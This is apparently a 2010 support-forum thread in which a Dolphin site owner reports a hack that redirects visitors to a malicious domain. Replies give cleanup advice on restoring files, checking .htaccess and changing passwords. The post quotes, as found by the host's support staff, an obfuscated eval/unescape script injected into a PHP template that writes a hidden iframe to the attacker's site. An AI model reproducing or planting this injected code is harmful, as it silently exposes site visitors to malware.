My Site Has Been Hacked

Hello Everyone,

My site has been hacked and now there is no access to my Index.PHP. Instead members are being redirected to: this info:

aversbonko.com
Summary
Computer Threats: 1
Identity Threats: 0
Annoyance factors: 0
   
Total threats on this site: 1
   
Community Reviews: 0

The Norton rating is a result of Symantec's automated analysis system. Learn more.
The opinions of our users are reflected separately in the community rating on the right.
General Info
Web Site Location     China

Norton Safe Web has analyzed aversbonko.com for safety and security problems. Below is a sample of the threats that were found
Also when I try to surf to any of my pages my norton pops up with either "unsafe site" message or displays a blank page.  I though it was a server error so I had my host tech support look at the problem.  They found this piece of code at line 28 of my BxTemplIndexPageView.php file:
WebHosting Support to me
show details 11:41 AM (56 minutes ago)

Jeff,
Here is the code that was appended to your
script /home/wowmobil/public_html/templates/tmpl_uni/scripts/BxTemplIndexPageView.php at line 28:
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2 C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->
This was the last line of the file.  I've removed it but the index page shows up blank now.
--David Miller
Tier 1 Support
Gigapros.com
Can anyone help with this?  My ADMIN panel shows the buttons but nothing else.  I cannot go in and configure anything.
Thank you,
Jeff
Quote · 11 Apr 2010

Look at your index.php or for an index.html in the root install of your Dolphin and delete it, then upload a fresh copy of index.php.  You should NOT have an index.html.

Next up, look at your .htaccess file for any redirects in it.  If you need a copy of a good one let us know and we'll post it up for you provided you have not modified yours.  Otherwise you'll have to go look at your mods and see if any you did had any rewrites that need added in.

You need to upload a fresh copy of your templates/tmpl_{tmpl}/scripts/BxDolTemplPageView.php file.  While they took that line out of the file there is alot more that belongs in it.  A blank page is a sign of bad php. 

Let us know if this helps out, it should get your pointed in the right direction to fixing this though. 

 

Also, find the whole they got in on and plug it.  Change all the passwords to the site & server.

Quote · 11 Apr 2010

Hi there, what version of Dolphin where you running? Was it 7 or 6.1?

Quote · 29 May 2010
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.